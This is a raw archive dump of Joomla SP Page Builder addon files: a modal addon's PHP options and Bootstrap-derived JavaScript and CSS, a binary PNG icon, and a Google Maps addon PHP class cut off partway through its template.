						'primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
						'success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
						'info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
						'warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
						'danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
						'link'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
						),
					'std'=>'default',
					'depends'=>array('modal_selector'=>'button')
					),
				'button_peicon'=>array(
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_PIXEDEN_ICON'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_PIXEDEN_ICON_DESC'),
					'std'=> '',
					'depends'=>array('modal_selector'=>'button'),
					'values'=> $peicon_list
					),
				'button_icon'=>array(
					'type'=>'icon', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_FONTAWESOME_ICON'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_FONTAWESOME_ICON_DESC'),
					'depends'=>array('modal_selector'=>'button')
					),
				'button_block'=>array(
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_BLOCK'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_BLOCK_DESC'),
					'values'=>array(
						''=>JText::_('JNO'),
						'sppb-btn-block'=>JText::_('JYES'),
						),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),
				'button_icon_position'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_POSITION'),
					'values'=>array(
						'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'depends'=>array(
						array('modal_selector', '=', 'button')
					),
				),

				'selector_image'=>array(
					'type'=>'media', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_SELECTOR_IMAGE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_IMAGE_SELECT_DESC'),
					'depends'=>array('modal_selector'=>'image')
					),
				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_RIGHT'),
						),
					'std'=>'sppb-text-left',
					),
				//Admin Only
				'separator'=>array(
					'type'=>'separator', 
					'title'=>JText::_('COM_SPPAGEBUILDER_MODAL_CONTENT'),
					),
				'modal_window_title'=>array(
					'type'=>'text', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BOOTSTRAP_MODAL_WINDOW_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BOOTSTRAP_MODAL_WINDOW_TITLE_DESC'),
					'std'=>'Modal'
					),
				'modal_content_text'=>array(
					'type'=>'editor', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_TEXT_DESC'),
					'std'=>'Credibly reintermediate backend ideas for cross-platform models. Continually reintermediate integrated processes through technically sound intellectual capital. Holistically foster superior methodologies without market-driven best practices.&lt;br&gt;&lt;br&gt;Distinctively exploit optimal alignments for intuitive bandwidth. Quickly coordinate e-business applications through revolutionary catalysts for change. Seamlessly underwhelm optimal testing procedures whereas bricks-and-clicks processes. Synergistically evolve 2.0 technologies rather than just in time initiatives. Quickly deploy strategic networks with compelling e-business. Credibly pontificate highly efficient manufactured products and enabled data.',
					),
				'modal_content_image'=>array(
					'type'=>'media', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_IMAGE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_IMAGE_DESC'),
					),
				'modal_content_video_url'=>array(
					'type'=>'text', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_VIDEO'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_VIDEO_URL_DESC'),
					),
				'modal_window_size'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_WINDOW_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_WINDOW_SIZE_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_WINDOW_SIZE_STANDARD'),
						'sppb-modal-lg'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_WINDOW_SIZE_LARGE'),
						'sppb-modal-sm'=>JText::_('COM_SPPAGEBUILDER_ADDON_MODAL_WINDOW_SIZE_SMALL'),
						),
					'std'=>'',
					),
				'class'=>array(
						'type'=>'text',
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
						'std'=>''
				),
			),
		),
	)
);PK!���i!i!Fflex/sppagebuilder/addons/bootstrap_modal/assets/js/bootstrap-modal.jsnu&1i�/* ========================================================================
 * Bootstrap: modal.js v3.2.0
 * http://getbootstrap.com/javascript/#modals
 * ========================================================================
 * Copyright 2011-2014 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 * ======================================================================== */


+function ($) {
  'use strict';
  

  // MODAL CLASS DEFINITION
  // ======================

  var SPPBModal = function (element, options) {
    this.options        = options
    this.$body          = $(document.body)
    this.$element       = $(element)
    this.$backdrop      =
    this.isShown        = null
    this.scrollbarWidth = 0

    if (this.options.remote) {
      this.$element
        .find('.sppb-modal-content')
        .load(this.options.remote, $.proxy(function () {
          this.$element.trigger('loaded.sppb.modal')
        }, this))
    }
  }

  SPPBModal.VERSION  = '3.2.0'

  SPPBModal.DEFAULTS = {
    backdrop: true,
    keyboard: true,
    show: true
  }

  SPPBModal.prototype.toggle = function (_relatedTarget) {
    return this.isShown ? this.hide() : this.show(_relatedTarget)
  }

  SPPBModal.prototype.show = function (_relatedTarget) {
    var that = this
    var e    = $.Event('show.sppb.modal', { relatedTarget: _relatedTarget })

    this.$element.trigger(e)

    if (this.isShown || e.isDefaultPrevented()) return

    this.isShown = true

    this.checkScrollbar()
    this.$body.addClass('sppb-modal-open')

    this.setScrollbar()
    this.escape()

    this.$element.on('click.dismiss.sppb.modal', '[data-dismiss="sppb-modal"]', $.proxy(this.hide, this))

    this.backdrop(function () {
      var transition = $.support.transition && that.$element.hasClass('sppb-fade')

      if (!that.$element.parent().length) {
        that.$element.appendTo(that.$body) // don't move modals dom position
      }

      that.$element
        .show()
        .scrollTop(0)

      if (transition) {
        that.$element[0].offsetWidth // force reflow
      }

      that.$element
        .addClass('in')
        .attr('aria-hidden', false)

      that.enforceFocus()

      var e = $.Event('shown.sppb.modal', { relatedTarget: _relatedTarget })

      transition ?
        that.$element.find('.sppb-modal-dialog') // wait for modal to slide in
          .one('bsTransitionEnd', function () {
            that.$element.trigger('focus').trigger(e)
          })
          .emulateTransitionEnd(300) :
        that.$element.trigger('focus').trigger(e)
    })
  }

  SPPBModal.prototype.hide = function (e) {
    if (e) e.preventDefault()

    e = $.Event('hide.sppb.modal')

    this.$element.trigger(e)

    if (!this.isShown || e.isDefaultPrevented()) return

    this.isShown = false

    this.$body.removeClass('sppb-modal-open')

    this.resetScrollbar()
    this.escape()

    $(document).off('focusin.sppb.modal')

    this.$element
      .removeClass('in')
      .attr('aria-hidden', true)
      .off('click.dismiss.sppb.modal')

    $.support.transition && this.$element.hasClass('sppb-fade') ?
      this.$element
        .one('bsTransitionEnd', $.proxy(this.hideModal, this))
        .emulateTransitionEnd(300) :
      this.hideModal()
  }

  SPPBModal.prototype.enforceFocus = function () {
    $(document)
      .off('focusin.sppb.modal') // guard against infinite focus loop
      .on('focusin.sppb.modal', $.proxy(function (e) {
        if (this.$element[0] !== e.target && !this.$element.has(e.target).length) {
          this.$element.trigger('focus')
        }
      }, this))
  }

  SPPBModal.prototype.escape = function () {
    if (this.isShown && this.options.keyboard) {
      this.$element.on('keyup.dismiss.sppb.modal', $.proxy(function (e) {
        e.which == 27 && this.hide()
      }, this))
    } else if (!this.isShown) {
      this.$element.off('keyup.dismiss.sppb.modal')
    }
  }

  SPPBModal.prototype.hideModal = function () {
    var that = this
    this.$element.hide()
    this.backdrop(function () {
      that.$element.trigger('hidden.sppb.modal')
    })
  }

  SPPBModal.prototype.removeBackdrop = function () {
    this.$backdrop && this.$backdrop.remove()
    this.$backdrop = null
  }

  SPPBModal.prototype.backdrop = function (callback) {
    var that = this
    var animate = this.$element.hasClass('sppb-fade') ? 'sppb-fade' : ''

    if (this.isShown && this.options.backdrop) {
      var doAnimate = $.support.transition && animate

      this.$backdrop = $('<div class="sppb-modal-backdrop ' + animate + '" />')
        .appendTo(this.$body)

      this.$element.on('click.dismiss.sppb.modal', $.proxy(function (e) {
        if (e.target !== e.currentTarget) return
        this.options.backdrop == 'static'
          ? this.$element[0].focus.call(this.$element[0])
          : this.hide.call(this)
      }, this))

      if (doAnimate) this.$backdrop[0].offsetWidth // force reflow

      this.$backdrop.addClass('in')

      if (!callback) return

      doAnimate ?
        this.$backdrop
          .one('bsTransitionEnd', callback)
          .emulateTransitionEnd(150) :
        callback()

    } else if (!this.isShown && this.$backdrop) {
      this.$backdrop.removeClass('in')

      var callbackRemove = function () {
        that.removeBackdrop()
        callback && callback()
      }
      $.support.transition && this.$element.hasClass('sppb-fade') ?
        this.$backdrop
          .one('bsTransitionEnd', callbackRemove)
          .emulateTransitionEnd(150) :
        callbackRemove()

    } else if (callback) {
      callback()
    }
  }

  SPPBModal.prototype.checkScrollbar = function () {
    if (document.body.clientWidth >= window.innerWidth) return
    this.scrollbarWidth = this.scrollbarWidth || this.measureScrollbar()
  }

  SPPBModal.prototype.setScrollbar = function () {
    var bodyPad = parseInt((this.$body.css('padding-right') || 0), 10)
    if (this.scrollbarWidth) this.$body.css('padding-right', bodyPad + this.scrollbarWidth)
  }

  SPPBModal.prototype.resetScrollbar = function () {
    this.$body.css('padding-right', '')
  }

  SPPBModal.prototype.measureScrollbar = function () { // thx walsh
    var scrollDiv = document.createElement('div')
    scrollDiv.className = 'sppb-modal-scrollbar-measure'
    this.$body.append(scrollDiv)
    var scrollbarWidth = scrollDiv.offsetWidth - scrollDiv.clientWidth
    this.$body[0].removeChild(scrollDiv)
    return scrollbarWidth
  }


  // MODAL PLUGIN DEFINITION
  // =======================

  function Plugin(option, _relatedTarget) {
    return this.each(function () {
      var $this   = $(this)
      var data    = $this.data('sppb.modal')
      var options = $.extend({}, SPPBModal.DEFAULTS, $this.data(), typeof option == 'object' && option)

      if (!data) $this.data('sppb.modal', (data = new SPPBModal(this, options)))
      if (typeof option == 'string') data[option](_relatedTarget)
      else if (options.show) data.show(_relatedTarget)
    })
  }

  var old = $.fn.sppbmodal

  $.fn.sppbmodal             = Plugin
  $.fn.sppbmodal.Constructor = SPPBModal


  // MODAL NO CONFLICT
  // =================

  $.fn.sppbmodal.noConflict = function () {
    $.fn.sppbmodal = old
    return this
  }


  // MODAL DATA-API
  // ==============

  $(document).on('click.sppb.modal.data-api', '[data-toggle="sppb-modal"]', function (e) {
    var $this   = $(this)
    var href    = $this.attr('href')
    var $target = $($this.attr('data-target') || (href && href.replace(/.*(?=#[^\s]+$)/, ''))) // strip for ie7
    var option  = $target.data('sppb.modal') ? 'toggle' : $.extend({ remote: !/#/.test(href) && href }, $target.data(), $this.data())

    if ($this.is('a')) e.preventDefault()

    $target.one('show.sppb.modal', function (showEvent) {
      if (showEvent.isDefaultPrevented()) return // only register focus restorer if modal will actually get shown
      $target.one('hidden.sppb.modal', function () {
        $this.is(':visible') && $this.trigger('focus')
      })
    })
    Plugin.call($target, option, this)
  })

  //Add Dynamic IDs
  $(document).ready(function(){
    $('.sppb-modal-selector').each(function (index){
      var id = 'sppb-modal' + (index+1);
      var modal = $(this).parent().next('.sppb-modal').appendTo('body');
      $(this).attr('data-target', '#' + id);
      $(modal).attr('id', id).attr('aria-labelledby', id + 'Label');
      $(modal).find('.sppb-modal-title').attr('id', id + 'Label');
    });
  });

}(jQuery);
PK!���B�	�	Hflex/sppagebuilder/addons/bootstrap_modal/assets/css/bootstrap-modal.cssnu&1i�
.sppb-modal-open {
  overflow: hidden;
}
.sppb-modal {
  display: none;
  overflow: hidden;
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1050;
  -webkit-overflow-scrolling: touch;
  outline: 0;
}
.sppb-modal.sppb-fade .sppb-modal-dialog {
  -webkit-transform: translate3d(0, -25%, 0);
  transform: translate3d(0, -25%, 0);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.sppb-modal.in .sppb-modal-dialog {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.sppb-modal-open .sppb-modal {
  overflow-x: hidden;
  overflow-y: auto;
}
.sppb-modal-dialog {
  position: relative;
  width: auto;
  margin: 10px;
  /*z-index:1030; /* fix for overlapping .sppb-modal-backdrop, added (1 Dec 2016) */
}
.sppb-modal-content {
  position: relative;
  background-color: #ffffff;
  border: 1px solid #999999;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 6px;
  -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  background-clip: padding-box;
  outline: 0;
}
.sppb-modal-backdrop {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1040;
  background-color: rgba(0,0,0,0.53)
}
.sppb-modal-backdrop.sppb-fade {
  opacity: 0;
  filter: alpha(opacity=0);
}
.sppb-modal-backdrop.in {
  opacity: 0.5;
  filter: alpha(opacity=50);
}
.sppb-modal-header {
  padding: 15px;
  border-bottom: 1px solid #e5e5e5;
  min-height: 16.42857143px;
}
.sppb-modal-header .close {
  margin-top: -2px;
}
.sppb-modal-title {
  margin: 0;
  line-height: 1.42857143;
}
.sppb-modal-body {
  position: relative;
  padding: 15px;
}
.sppb-modal-footer {
  padding: 15px;
  text-align: right;
  border-top: 1px solid #e5e5e5;
}
.sppb-modal-footer .sppb-btn + .sppb-btn {
  margin-left: 5px;
  margin-bottom: 0;
}
.sppb-modal-footer .sppb-btn-block + .sppb-btn-block {
  margin-left: 0;
}
.sppb-modal-scrollbar-measure {
  position: absolute;
  top: -9999px;
  width: 50px;
  height: 50px;
  overflow: scroll;
}
@media (min-width: 768px) {
  .sppb-modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .sppb-modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
  .sppb-modal-sm {
    width: 300px;
  }
}
@media (min-width: 992px) {
  .sppb-modal-lg {
    width: 900px;
  }
}
PK!�r���@flex/sppagebuilder/addons/bootstrap_modal/assets/images/icon.pngnu&1i��PNG


IHDR@@�iq�tEXtSoftwareAdobe ImageReadyq�e<#iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:1745D8A05A1B11E5B190DF20FA0AEDC1" xmpMM:DocumentID="xmp.did:1745D8A15A1B11E5B190DF20FA0AEDC1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1980E2135A1A11E5B190DF20FA0AEDC1" stRef:documentID="xmp.did:1980E2145A1A11E5B190DF20FA0AEDC1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>o�?:IDATx��[�oU����[ڰd�Ze[DZ(�Ux1�hbbI
Q��7������c⋏^�[��hl0��bK/�����J"�t�ݝ��wffם=��3�g��LO�9{�o����}Ï��"d�U�E� N N!�D�Í�"�����#���3�HƵ�8lT:�N��t��QNk�4u�>�]X�#��L
���L!����� ������^@�C��(@{A�ѫ��X���X�L�F`�	>*���-��	TM��>�jU�����7����eE|q	�d"�$>}�j�ې?��S_!l-i�a��{�|�6Pݻ�!�'�RϻN��Ƽ̳��	H�qШ^Ҟ˚�niUM�^ ��l�$�h�
�&r�X�-ma��ե6���6�{�Lض�B����v|�����&;zZs)�P�T�s�&Cus�A{wy;��k�����e�F�_����f����p�Fe����U�5~���v�z*��kt���?rq�3��L�[/p��\Gw+
 ix����t�7g=��k�p3�Ss��'ZaU�::��
�<�X��_�{��zB�y$I05��qϞ.��D��m
S�|Y��.K���7���V�*��n�����ς,�����[pv�n/��T�6�n�5�6� �������E�%9��wa�e�	?�/��G�X4Р�0=.�`�#X=����8��&#�m瓟��P���$W�	�N��߽���n����5��]��pV�����K�~�M���v��m_7wil�����yl^�Ӝ�9RԦ�6'�HE���D�|��_�Ù_;��O��Gr��^*�Z1D-�y����Wc�h�
��7��^��b����f0�����l��H6Mt����H;j�̦��zW[bŵ�������V[%������5�f1��D��U���p���H�3���U�b(D��{���|ؕW#��M�q�WOu==/�
�V�b��(��
�d+¤�Lx|����a�wZ������h��
�Wj�� ���B]z5�6`�Kfj��y��&�{؜�_��M{�#�ޑ�WT�m�%���ƒ�f�gTo )0����f���MX�������HJ��UMqO`�,
\NjAp���x�QP�j��P��$��"��?�xgN�'}G@���J�P�@��x�C�!�+��O-^�~���[�3�`�����P?�0>
�Jv���C��
c8�@G�`�?
��`�PBE�MIEND�B`�PK!�d�U�1�1'flex/sppagebuilder/addons/gmap/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2019 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

class SppagebuilderAddonGmap extends SppagebuilderAddons {

		public function render() {
	
		$app = JFactory::getApplication();
		$doc = JFactory::getDocument();
		$tmpl_url = JURI::base(true) . '/templates/' . $app->getTemplate() . '/images/';
		
		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class : '';
		$title = (isset($this->addon->settings->title) && $this->addon->settings->title) ? $this->addon->settings->title : '';
		$heading_selector = (isset($this->addon->settings->heading_selector) && $this->addon->settings->heading_selector) ? $this->addon->settings->heading_selector : 'h3';

		//Options
		$map = (isset($this->addon->settings->map) && $this->addon->settings->map) ? $this->addon->settings->map : '';
		$api_key = (isset($this->addon->settings->api_key) && $this->addon->settings->api_key) ? $this->addon->settings->api_key : '';
		$gmap_api = (isset($this->addon->settings->gmap_api) && $this->addon->settings->gmap_api) ? $this->addon->settings->gmap_api : '';
		
		$infowindow = (isset($this->addon->settings->infowindow) && $this->addon->settings->infowindow) ? $this->addon->settings->infowindow : '';
		
		$type = (isset($this->addon->settings->type) && $this->addon->settings->type) ? $this->addon->settings->type : '';
		$zoom = (isset($this->addon->settings->zoom) && $this->addon->settings->zoom) ? $this->addon->settings->zoom : '';
		$mousescroll = (isset($this->addon->settings->mousescroll) && $this->addon->settings->mousescroll) ? $this->addon->settings->mousescroll : '';
		
		$fullscreen_control = (isset($this->addon->settings->fullscreen_control) && $this->addon->settings->fullscreen_control) ? $this->addon->settings->fullscreen_control : '';
		$street_view_control = (isset($this->addon->settings->street_view_control) && $this->addon->settings->street_view_control) ? $this->addon->settings->street_view_control : '';
		$map_type_control = (isset($this->addon->settings->map_type_control) && $this->addon->settings->map_type_control) ? $this->addon->settings->map_type_control : '';
		
		$show_transit = (isset($this->addon->settings->show_transit) && $this->addon->settings->show_transit) ? $this->addon->settings->show_transit : '';
		$show_poi = (isset($this->addon->settings->show_poi) && $this->addon->settings->show_poi) ? $this->addon->settings->show_poi : '';
		
		$fullscreen_control != 'true' ? $data_fullscreen_control = ' data-fullscreen_control="' . $fullscreen_control . '"' : $data_fullscreen_control = '';
		$street_view_control != 'true' ? $data_street_view_control = ' data-street_view_control="' . $street_view_control . '"' : $data_street_view_control = '';
		$map_type_control != 'true' ? $data_map_type_control = ' data-map_type_control="' . $map_type_control . '"' : $data_map_type_control = '';
		
		//$show_transit != 'on' ? $data_show_transit = ' data-show_transit="off"' : $data_show_transit = ' data-show_transit="on"';
		//$show_poi != 'on' ? $data_show_poi = ' data-show_poi="off"' : $data_show_poi = ' data-show_poi="on"';
		
		$show_transit == 1 ? $data_show_transit = ' data-show_transit="on"' : $data_show_transit = ' data-show_transit="off"';
		$show_poi == 1 ? $data_show_poi = ' data-show_poi="on"' : $data_show_poi = ' data-show_poi="off"';
		
		$water_color = (isset($this->addon->settings->water_color) && $this->addon->settings->water_color) ? $this->addon->settings->water_color : '';
		$highway_stroke_color = (isset($this->addon->settings->highway_stroke_color) && $this->addon->settings->highway_stroke_color) ? $this->addon->settings->highway_stroke_color : '';
		$highway_fill_color = (isset($this->addon->settings->highway_fill_color) && $this->addon->settings->highway_fill_color) ? $this->addon->settings->highway_fill_color : '';
		$local_stroke_color = (isset($this->addon->settings->local_stroke_color) && $this->addon->settings->local_stroke_color) ? $this->addon->settings->local_stroke_color : '';
		$local_fill_color = (isset($this->addon->settings->local_fill_color) && $this->addon->settings->local_fill_color) ? $this->addon->settings->local_fill_color : '';
		$poi_fill_color = (isset($this->addon->settings->poi_fill_color) && $this->addon->settings->poi_fill_color) ? $this->addon->settings->poi_fill_color : '';
		$administrative_color = (isset($this->addon->settings->administrative_color) && $this->addon->settings->administrative_color) ? $this->addon->settings->administrative_color : '';
		$landscape_color = (isset($this->addon->settings->landscape_color) && $this->addon->settings->landscape_color) ? $this->addon->settings->landscape_color : '';
		$road_text_color = (isset($this->addon->settings->road_text_color) && $this->addon->settings->road_text_color) ? $this->addon->settings->road_text_color : '';
		$road_arterial_fill_color = (isset($this->addon->settings->road_arterial_fill_color) && $this->addon->settings->road_arterial_fill_color) ? $this->addon->settings->road_arterial_fill_color : '';
		$road_arterial_stroke_color = (isset($this->addon->settings->road_arterial_stroke_color) && $this->addon->settings->road_arterial_stroke_color) ? $this->addon->settings->road_arterial_stroke_color : '';
		
		//$map_type_control != 'true' ? $data_map_type_control = ' data-map_type_control="' . $map_type_control . '"' : $data_map_type_control = '';
		//$street_view_control != 'true' ? $data_street_view_control = ' data-street_view_control="' . $street_view_control . '"' : $data_street_view_control = '';
		$water_color != '' ? $data_water_color = ' data-water_color="' . $water_color . '"' : $data_water_color = '';
		$highway_stroke_color != '' ? $data_highway_stroke_color = ' data-highway_stroke_color="' . $highway_stroke_color . '"' : $data_highway_stroke_color = '';
		$highway_fill_color != '' ? $data_highway_fill_color = ' data-highway_fill_color="' . $highway_fill_color . '"' : $data_highway_fill_color = '';
		$local_stroke_color != '' ? $data_local_stroke_color = ' data-local_stroke_color="' . $local_stroke_color . '"' : $data_local_stroke_color = '';
		$local_fill_color != '' ? $data_local_fill_color = ' data-local_fill_color="' . $local_fill_color . '"' : $data_local_fill_color = '';
		$poi_fill_color != '' ? $data_poi_fill_color = ' data-poi_fill_color="' . $poi_fill_color . '"' : $data_poi_fill_color = '';
		$administrative_color != '' ? $data_administrative_color = ' data-administrative_color="' . $administrative_color . '"' : $data_administrative_color = '';
		$landscape_color != '' ? $data_landscape_color = ' data-landscape_color="' . $landscape_color . '"' : $data_landscape_color = '';
		$road_text_color != '' ? $data_road_text_color = ' data-road_text_color="' . $road_text_color . '"' : $data_road_text_color = '';
		$road_arterial_fill_color != '' ? $data_road_arterial_fill_color = ' data-road_arterial_fill_color="' . $road_arterial_fill_color . '"' : $data_road_arterial_fill_color = '';
		$road_arterial_stroke_color != '' ? $data_road_arterial_stroke_color = ' data-road_arterial_stroke_color="' . $road_arterial_stroke_color . '"' : $data_road_arterial_stroke_color = '';
	
		if($map) {
			$map = explode(',', $map);
			$output  = '<div id="sppb-addon-map-'. $this->addon->id .'" class="sppb-addon sppb-addon-gmap ' . $class . '">';
			$output .= ($title) ? '<'.$heading_selector.' class="sppb-addon-title">' . $title . '</'.$heading_selector.'>' : '';
			$output .= '<div class="sppb-addon-content">';
			$output .= '<div id="sppb-addon-gmap-'. $this->addon->id .'" class="sppb-addon-gmap-canvas" data-lat="' . trim($map[0]) . '" data-lng="' . trim($map[1]) . '" data-tmpl_url="' . $tmpl_url . '" data-maptype="' . $type . '" data-mapzoom="' . $zoom . '"'. $data_map_type_control . $data_street_view_control . $data_fullscreen_control .' data-infowindow="' . base64_encode($infowindow) . '" data-mousescroll="' . $mousescroll . '"'. $data_water_color . $data_highway_stroke_color . $data_highway_fill_color . $data_local_stroke_color . $data_local_fill_color . $data_poi_fill_color . $data_administrative_color . $data_landscape_color . $data_road_text_color . $data_road_arterial_fill_color . $data_road_arterial_stroke_color . $data_show_transit . $data_show_poi;
			$output .= '></div>';
			$output .= '</div>';
			$output .= '</div>';
			return $output;
		}

		return;
	}

	public function scripts() {

		$app = JFactory::getApplication();
		$doc = JFactory::getDocument();
		
		
		jimport('joomla.application.component.helper');
		$params = JComponentHelper::getParams('com_sppagebuilder');
		$gmap_api = $params->get('gmap_api', '');
		$api_key = (isset($this->addon->settings->api_key) && $this->addon->settings->api_key) ? $this->addon->settings->api_key : '';
		//$api_key = (isset($this->addon->settings->api_key) && $this->addon->settings->api_key) ? $this->addon->settings->api_key : '';
	
		if($gmap_api != '') {
			return array(
				'//maps.googleapis.com/maps/api/js?key='. $gmap_api,
				JURI::base(true) . '/templates/' . $app->getTemplate() . '/js/gmap.js'
			);
		} else {
			return array(
				'//maps.googleapis.com/maps/api/js?key='. $api_key,
				JURI::base(true) . '/templates/' . $app->getTemplate() . '/js/gmap.js'
			);
		}	
	}
	
	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$height = (isset($this->addon->settings->height) && $this->addon->settings->height) ? $this->addon->settings->height : 0;
		$height_sm = (isset($this->addon->settings->height_sm) && $this->addon->settings->height_sm) ? $this->addon->settings->height_sm : 0;
		$height_xs = (isset($this->addon->settings->height_xs) && $this->addon->settings->height_xs) ? $this->addon->settings->height_xs : 0;

		$css = '';
		if($height) {
			$css .= $addon_id . ' .sppb-addon-gmap-canvas {';
			$css .= 'height:' . (int) $height . 'px;';
			$css .= '}';
		}

		if ($height_sm) {
			$css .= '@media (min-width: 768px) and (max-width: 991px) {';
				$css .= $addon_id . ' .sppb-addon-gmap-canvas {';
				$css .= 'height:' . (int) $height_sm . 'px;';
				$css .= '}';
			$css .= '}';
		}

		if ($height_xs) {
			$css .= '@media (max-width: 767px) {';
				$css .= $addon_id . ' .sppb-addon-gmap-canvas {';
				$css .= 'height:' . (int) $height_xs . 'px;';
				$css .= '}';
			$css .= '}';
		}

		return $css;
	}
	
	public static function getTemplate() {
		$output = '
		<#
			var map = data.map.split(",");
			var transitShow = (data.show_transit == 1) ? "on" : "off";
			var poiShow = (data.show_transit == 1) ? "on" : "off";
		#>
		<style type="text/css">
		#sppb-addon-{{ data.id }} .sppb-addon-gmap-canvas {
			<# if(_.isObject(data.height)){ #>
				height: {{ data.height.md }}px;
			<# } else { #>
				height: {{ data.height }}px;
			<# } #>
		}
		@media (min-width: 768px) and (max-width: 991px) {
			#sppb-addon-{{ data.id }} .sppb-addon-gmap-canvas {
				<# if(_.isObject(data.height)){ #>
					height: {{ data.height.sm }}px;
				<# } #>
			}
		}
		@media (max-width: 767px) {
			#sppb-addon-{{ data.id }} .sppb-addon-gmap-canvas {
				<# if(_.isObject(data.height)){ #>
					height: {{ data.height.xs }}px;
				<# } #>
			}
		}
		</style>
		<div id="sppb-addon-map-{{ data.id }}" class="sppb-addon sppb-addon-gmap {{ data.class }}">
			<# if( !_.isEmpty( data.title ) ){ #><{{ data.heading_selector }} class="sppb-addon-title">{{ data.title }}</{{ data.heading_selector }}><# } #>
			<div class="sppb-addon-content">
